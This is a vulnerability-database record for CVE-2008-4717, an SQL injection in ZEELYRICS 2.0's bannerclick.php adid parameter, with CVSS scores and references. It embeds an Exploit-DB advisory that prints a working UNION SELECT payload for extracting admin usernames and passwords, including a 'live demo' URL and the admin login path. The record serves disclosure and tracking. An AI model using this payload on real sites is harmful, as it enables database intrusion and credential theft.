ID CVE-2008-4717
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
SQL injection vulnerability in bannerclick.php in ZEELYRICS 2.0 allows remote attackers to execute arbitrary SQL commands via the adid parameter.
{"id": "CVE-2008-4717", "bulletinFamily": "NVD", "title": "CVE-2008-4717", "description": "SQL injection vulnerability in bannerclick.php in ZEELYRICS 2.0 allows remote attackers to execute arbitrary SQL commands via the adid parameter.", "published": "2008-10-23T20:00:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4717", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/32020", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45508", "http://securityreason.com/securityalert/4479", "https://www.exploit-db.com/exploits/6608", "http://www.securityfocus.com/bid/31449"], "cvelist": ["CVE-2008-4717"], "type": "cve", "lastseen": "2021-02-02T05:35:18", "edition": 4, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6608"]}], "modified": "2021-02-02T05:35:18", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-02-02T05:35:18", "rev": 2}, "vulnersScore": 7.5}, "cpe": ["cpe:/a:zeeways:zeelyrics:2.0"], "affectedSoftware": [{"cpeName": "zeeways:zeelyrics", "name": "zeeways zeelyrics", "operator": "eq", "version": "2.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:zeeways:zeelyrics:2.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:zeeways:zeelyrics:2.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "6608", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/6608"}, {"name": "31449", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/31449"}, {"name": "32020", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/32020"}, {"name": "4479", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/4479"}, {"name": "zeelyrics-bannerclick-sql-injection(45508)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45508"}]}
{"exploitdb": [{"lastseen": "2016-02-01T01:14:09", "description": "ZEELYRICS 2.0 (bannerclick.php adid) SQL Injection Vulnerability. CVE-2008-4717. Webapps exploit for php platform", "published": "2008-09-28T00:00:00", "type": "exploitdb", "title": "ZEELYRICS 2.0 bannerclick.php adid SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4717"], "modified": "2008-09-28T00:00:00", "id": "EDB-ID:6608", "href": "https://www.exploit-db.com/exploits/6608/", "sourceData": "|___________________________________________________|\n|\n| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------------Hussin X----------------------|\n|\n| Author: Hussin X\n|\n| Home : IQ-SecuritY > www.IQ-tY.com\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|\n|___________________________________________________\n| |\n|\n| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html\n|\n|___________________________________________________|\n\nExploit: \n________\n\n\n\nwww.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--\n\n\n\n\nL!VE DEMO:\n_________\n\n\nhttp://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--\n\n\n\n\n\n___________________\n\n\nAdmin LogiN :\n\nwww.[target].com/Script/admin/\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr\n|\n| FAHD | Iraqihack | str0ke | Cyber-Zone\n|_____________________________________________________________________\n\n\n Im IRAQi\n\n# milw0rm.com [2008-09-28]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6608/"}]}